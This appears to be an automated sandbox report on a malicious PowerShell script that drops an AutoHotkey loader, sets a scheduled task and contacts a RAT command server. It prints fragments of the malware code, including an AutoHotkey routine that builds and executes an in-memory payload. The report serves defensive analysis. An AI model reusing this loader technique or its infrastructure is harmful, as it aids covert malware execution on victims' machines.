Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@28/10@2/2
EGA Information:	Successful, ratio: 88.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 274 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7316 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:20:10	API Interceptor	11x Sleep call for process: powershell.exe modified
04:20:11	API Interceptor	3x Sleep call for process: AutoHotkey64.exe modified
04:20:25	API Interceptor	6137048x Sleep call for process: AddInProcess32.exe modified
09:20:12	Task Scheduler	Run new task: 3losh path: C:\Users\Public\Documents\AutoHotkey64.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	Shipping Bill6239999 dated 13122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	ip-api.com/json/
	Creal.exe	Get hash	malicious	Blackshades	Browse	ip-api.com/json/
	factura 000601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	msedge.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	imagelogger.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	NJRAT DANGEROUS.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	com surrogate.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost	Get hash	malicious	Unknown	Browse	208.95.112.2
	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Shipping Bill6239999 dated 13122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Creal.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	factura 000601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	msedge.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	imagelogger.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	NJRAT DANGEROUS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
USG-CORPORATIONUS	gw3yTM2uiZ.elf	Get hash	malicious	Mirai	Browse	66.225.192.17
	HH1taEkC4e.exe	Get hash	malicious	AsyncRAT, Neshta	Browse	66.225.254.138
	mfyPnr7Rxa.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	66.225.241.7
	https://fundacionjuntospodemos.com/scallerings/dlrP/PqUhzU/cGF0cmljZS53b2xmZUBhZ3NoZWFsdGguY29t	Get hash	malicious	Unknown	Browse	66.225.241.82
	Request for Quotation.exe	Get hash	malicious	Unknown	Browse	66.225.241.24
	jQegXWWQ3V.exe	Get hash	malicious	FormBook, GuLoader	Browse	66.225.241.82
	TNT Original Invoice.exe	Get hash	malicious	FormBook	Browse	66.225.241.38
	TNT Original Invoice.exe	Get hash	malicious	FormBook	Browse	66.225.241.38
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	66.225.241.38
	PAYMENT COPY.exe	Get hash	malicious	FormBook	Browse	66.225.241.38
TUT-ASUS	https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=cost	Get hash	malicious	Unknown	Browse	208.95.112.2
	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Shipping Bill No6239999Dt09122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Shipping Bill6239999 dated 13122024.PDF.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	208.95.112.1
	Creal.exe	Get hash	malicious	Blackshades	Browse	208.95.112.1
	factura 000601.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	msedge.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	imagelogger.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	NJRAT DANGEROUS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Documents\AutoHotkey64.exe	AutoHotkey_1.1.37.02_setup.exe	Get hash	malicious	Unknown	Browse
	u5xsMlmIem.exe	Get hash	malicious	AsyncRAT	Browse
	#U05ea#U05d9#U05e7 #U05d4#U05d7#U05e7#U05d9#U05e8#U05d4.vbs	Get hash	malicious	AsyncRAT	Browse

Created / dropped Files

C:\Users\Public\Documents\A.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	343365
Entropy (8bit):	3.0713585039960165
Encrypted:	false
SSDEEP:	768:XCqqmw+uHEp6tGiO4XVE1ryiPZDIikWTFWLlcJoPJJL1PhNhEA83ZwCcwB9zMaiU:XC1HYVcY74XgMIndr2Q2bUuQ6628
MD5:	9B901A1386E04B0B0E5CC79A145C0E61
SHA1:	53555BC6BE482B80DCE9BB175474ABF48B72BD40
SHA-256:	17409213D1370B4B30C07CD73B33EC7EE7CEB78245082654831BCD35B555B290
SHA-512:	8572814FB3B14FB3ADF2F36263C13D7A38603E53754BDBA78AE16FA908A921C8C36F110A45778A76152C0698F545538454A5EEF2FB2DACA3146985B35B43EC36
Malicious:	false
Preview:	38.5, 45, 72, 0, 1.5, 0, 0, 0, 2, 0, 0, 0, 127.5, 127.5, 0, 0, 92, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 7, 15.5, 93, 7, 0, 90, 4.5, 102.5, 16.5, 92, 0.5, 38, 102.5, 16.5, 42, 52, 52.5, 57.5, 16, 56, 57, 55.5, 51.5, 57, 48.5, 54.5, 16, 49.5, 48.5, 55, 55, 55.5, 58, 16, 49, 50.5, 16, 57, 58.5, 55, 16, 52.5, 55, 16, 34, 39.5, 41.5, 16, 54.5, 55.5, 50, 50.5, 23, 6.5, 6.5, 5, 18, 0, 0, 0, 0, 0, 0, 0, 40, 34.5, 0, 0, 38, 0.5, 1.5, 0, 63.5, 30, 44, 51.5, 0, 0, 0, 0, 0, 0, 0, 0, 112, 0, 1, 0.5, 5.5, 0.5, 4, 0, 0, 24, 0.5, 0, 0, 5, 0, 0, 0, 0, 0, 0, 23, 39, 0.5, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 16, 0, 0, 0, 1, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 80, 0.5, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 48, 66.5, 0, 0, 8, 0, 0, 8, 0, 0, 0, 0, 8, 0, 0, 8, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 106, 38.5, 0.5, 0, 43.5, 0, 0, 0, 0, 48, 0.5, 0, 0, 4, 0, 0, 0, 0, 0,

C:\Users\Public\Documents\AutoHotkey64.ahk

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6556
Entropy (8bit):	4.705228282920758
Encrypted:	false
SSDEEP:	192:aeSwhblP7Z6Z3j9RamZcTMirN0V8zsgBZnK+p5x:Dblshpk7TMirN0VosgBtK+l
MD5:	A51D3CC02396652AC39DE494E7D725D6
SHA1:	E4659A4561AC38659F7786F78485086AA1573036
SHA-256:	D2FB28BBAFA9B105BED3334225778451529CBB2F847594021CCCFAB7F7D69C5D
SHA-512:	A4D2D3CA7D4D7CA7DCDCD8F7A46004ADE1CFF22F335B488972070D83602FB30D0B684FDA4CD2677CCEFB7AFDABCEB1D642152759B2F6C1796F3011DAD272DDA8
Malicious:	false
Preview:	ReadFromFile(path) {.. FileRead, fileContents, %path%.... SplitArray := StrSplit(fileContents, ",").... bufferArr := [].... Loop, % SplitArray.MaxIndex().. {.. bufferArr.Push(Ceil(SplitArray[A_Index] * 2)).. }.. return bufferArr..}....GetFunctionPtr(lib, FuncName) {.. ; Load the DLL.. pHandle := DllCall("LoadLibraryA", "astr", lib, "ptr").. if (pHandle = 0) {.. return 0.. }.... ; Get the function pointer.. pMethod := DllCall("GetProcAddress", "ptr", pHandle, "astr", FuncName, "ptr").. if (pMethod = 0) {.. DllCall("FreeLibrary", "ptr", pHandle).. return 0.. }.... return pMethod..}....Execute(buffer, path) {.... bufferLength := buffer.Length().. VarSetCapacity(payload, bufferLength).... Loop % buffer.Length().. {.. byteValue := buffer[A_Index].. NumPut(byteValue, &payload, (A_Index -1), "char").. }.... ; Constant.. STARTF_USESHOWWINDOW := 0x00000001.. SW_SHOWNORMAL := 1..

C:\Users\Public\Documents\AutoHotkey64.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1319936
Entropy (8bit):	6.464964894032244
Encrypted:	false
SSDEEP:	24576:a3CTQQje6KWjFUsTNEDcN20pah5nQsrivkdhWeWr2O8hYzlj1TNp4j7YoqK:a3CTQQjxKWjFUsTWDcN20k5nQsrivkdq
MD5:	2D0600FE2B1B3BDC45D833CA32A37FDB
SHA1:	E9A7411BFEF54050DE3B485833556F84CABD6E41
SHA-256:	EFFDEA83C6B7A1DC2CE9E9D40E91DFD59BED9FCBD580903423648B7CA97D9696
SHA-512:	9891CD6D2140C3A5C20D5C2D6600F3655DF437B99B09AE0F9DAF1983190DC73385CC87F02508997BB696AC921EEE43FCCDF1DC210CC602938807BDB062CE1703
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: AutoHotkey_1.1.37.02_setup.exe, Detection: malicious, Browse Filename: u5xsMlmIem.exe, Detection: malicious, Browse Filename: #U05ea#U05d9#U05e7 #U05d4#U05d7#U05e7#U05d9#U05e8#U05d4.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..]./..P.......P......YP...(4..P...(0..P...($..P...P..(Q....)..P.......P....-..P....*..P..Rich.P..........PE..d....5.e..........#............................@..............................................@.................................................,....0..................................................................................P............................text...6........................... ..`.rdata...I.......J..................@..@.data........0...R..................@....pdata...............p..............@..@text.....%.......&..................@.. data.....n.......p..................@..@.rsrc........0......................@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	609
Entropy (8bit):	5.356231720746034
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLUE4K5E4KH1qE4qXKDE4KhKiKhk
MD5:	A383F068145321195B33BC8EDBB8FEAB
SHA1:	6CA228B1376FAE1E2D1A382497BC3A6C5A525EDD
SHA-256:	C6A811C868B6D9AC8C4B2BB9432539BF8B1422FC21A7ACD81A3EC57FA478BCAA
SHA-512:	134B3B63D6304E0A9AEE3512D41E98CF327D20CFF503AAACC49514842768DC2B75D2AD7487176A036A0ECBEFD17EB3046D5FE4D9EC58ED3C5A37BDBA6D40519C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2904
Entropy (8bit):	5.239599278702704
Encrypted:	false
SSDEEP:	48:xmnSU4y4RQmFoUeComfm9qr9trBLNWiQULJ6D6rsQzZVwn8/oLg96GfJ:ISHyIFKL4O9qrPBRWi3Hzgbggu
MD5:	F49003EF213C424E426E416F4F632899
SHA1:	A918A8E33B2F9EA99F972D009F437CD71E651522
SHA-256:	A62384748C157882991392D6160AC44428AA42CF38DB212869C86163DE30CD0E
SHA-512:	B8D958C73B0340EECAC9347F9945E265DF92FAA9D86469A5CCE1BBB33FA44B0AB01F0B840DCCF32693ED15C631248DEE572DE5FF86D6AC26FE0DBD9D9CA7EBD2
Malicious:	false
Preview:	@...e.................................L..............@..........8.................C}...C....n..B........Microsoft.CSharpH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD.......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehgsqvhe.utp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lolkrnlj.vyx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Logs\12-18-2024

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	data
Category:	dropped
Size (bytes):	224
Entropy (8bit):	7.05936887285386
Encrypted:	false
SSDEEP:	6:6ZHGSJ+mgvmyhPKWCjOj69zEMGfjhjCFt6Q:6ZmSwmgv3r3jtMGjh2FgQ
MD5:	AFA4B3D2C2BD151DAA90B9A5266AC87F
SHA1:	77B8DCE503E6054A30BBE8A7937B3CB839432A3B
SHA-256:	02BCF40FE0C88699FA016DF13A39F653B55BE8ADA9CFEEEE16AF93E2F660D94D
SHA-512:	CFDEE1ADC208EA3C87CAF82403E927363F183FEA64041B883D47CB3A3C31FF6D8F73B962B39C44F5B6324C34266DB65317BD3A0F99A722971CF6AF673076D969
Malicious:	false
Preview:	.._.?.q..5O..KW\|..K.y.....3f.[y...s Fq..C.6....g.8..K........_.....P..%...3....s..j....=.Z...3....p..t.?t.a.<.b.-..u...%^.uZ...C...A....Wr.9..W{>..uv..[..?.....i..n*......o.W....~...S..46.?....( l....r.....\|.".Gr.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7337626807600497
Encrypted:	false
SSDEEP:	48:tJIHwpLPr3C4U284jXoukvhkvklCywrmdXt17lhEKSogZo+3t17luEKSogZo61:rrp33CxH4NkvhkvCCtct17MHLt17lHF
MD5:	FBB386E872BF73730E6F99316BBA486A
SHA1:	6012776751CF48351B518B8799C67A6609D9E076
SHA-256:	139FAFBE0F352341A8B8ACF126F1EC80623A25FB6F02936EB23E189825F3C658
SHA-512:	48B2AEF801CC5EA70FDD1D4684CE0D9EA147E08E9E0D0A050052B17A4DE25083F282EC081AA3BECA0AE5DF10BCABF65E7EA62A1FC13ED029E1D327BFAE8D1DDA
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....e....Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v..../M...Q...h...Q......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.J...........................%..A.p.p.D.a.t.a...B.V.1......Y.J..Roaming.@......CW.^.Y.J...........................6..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.J..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`...........................C<.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.J....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EGMBDDDRSIC84HDBHO5E.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7337626807600497
Encrypted:	false
SSDEEP:	48:tJIHwpLPr3C4U284jXoukvhkvklCywrmdXt17lhEKSogZo+3t17luEKSogZo61:rrp33CxH4NkvhkvCCtct17MHLt17lHF
MD5:	FBB386E872BF73730E6F99316BBA486A
SHA1:	6012776751CF48351B518B8799C67A6609D9E076
SHA-256:	139FAFBE0F352341A8B8ACF126F1EC80623A25FB6F02936EB23E189825F3C658
SHA-512:	48B2AEF801CC5EA70FDD1D4684CE0D9EA147E08E9E0D0A050052B17A4DE25083F282EC081AA3BECA0AE5DF10BCABF65E7EA62A1FC13ED029E1D327BFAE8D1DDA
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....e....Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v..../M...Q...h...Q......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.J...........................%..A.p.p.D.a.t.a...B.V.1......Y.J..Roaming.@......CW.^.Y.J...........................6..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y.J..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWT`..Windows.@......CW.^DWT`...........................C<.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.J....Q...........

Static File Info

General

File type:	ASCII text, with very long lines (65279), with CRLF line terminators
Entropy (8bit):	5.502495834053039
TrID:
File name:	x.ps1
File size:	2'113'070 bytes
MD5:	97646b99bb7245a7be3bbe8a0ff06348
SHA1:	33edac8a75cac4a0a1d084174b3dc912b9744386
SHA256:	3496b253962f9fad33450751e615e676ad8f847d11c50df45a35647b2534755d
SHA512:	066b635e03bf515f75327388d7118560fbf84fe4d5b64740c3b5a101123650ccb9d9252597301b78bf3a4849a57d73bd3f12192531e856fc6fbbce4b66571b2b
SSDEEP:	24576:bSgmuyXfET5YN3b2LLG1z/7E4/KpdMJczdsrbI8:biMSNKLq1zjA2
TLSH:	B0A51AF20ACA6BB91298ED7C41431D462EDDD58F311ED10FF6C9A47AE66E8048E4DF90
File Content Preview:	............$DocPath = [System.Environment]::GetFolderPath('CommonDocuments')..$scriptPath = $PSCommandPath;..$scriptContent = Get-Content $scriptPath; ..$comments = $scriptContent \| Where-Object { $_ -match '^\s*#' };..$arrComments = $comments.Split('#')

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T10:20:20.337990+0100	2036383	ET MALWARE Common RAT Connectivity Check Observed	1	192.168.2.4	49730	208.95.112.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 10:20:19.082365036 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:20:19.201963902 CET	80	49730	208.95.112.1	192.168.2.4
Dec 18, 2024 10:20:19.202049017 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:20:19.202399969 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:20:19.321845055 CET	80	49730	208.95.112.1	192.168.2.4
Dec 18, 2024 10:20:20.297431946 CET	80	49730	208.95.112.1	192.168.2.4
Dec 18, 2024 10:20:20.337990046 CET	49730	80	192.168.2.4	208.95.112.1
Dec 18, 2024 10:20:20.820822954 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:20.940785885 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:20.941066027 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:22.069144011 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:22.244276047 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.200897932 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.320632935 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.525367975 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.527713060 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.647857904 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.859844923 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.859890938 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.859906912 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.859946966 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979541063 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979609966 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979634047 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979661942 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979676962 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979691029 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979706049 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979707003 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979721069 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979727030 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979736090 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979752064 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:25.979765892 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979793072 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:25.979872942 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.041142941 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.050941944 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.051007986 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.051059008 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.099457026 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.099548101 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.099598885 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.103622913 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.103708029 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.103769064 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.112091064 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.112420082 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.112468004 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.120481968 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.120654106 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.120699883 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.128902912 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.129017115 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.129061937 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.137393951 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.137497902 CET	1177	49731	66.225.254.246	192.168.2.4
Dec 18, 2024 10:20:26.137538910 CET	49731	1177	192.168.2.4	66.225.254.246
Dec 18, 2024 10:20:26.145709991 CET	1177	49731	66.225.254.246	192.168.2.4
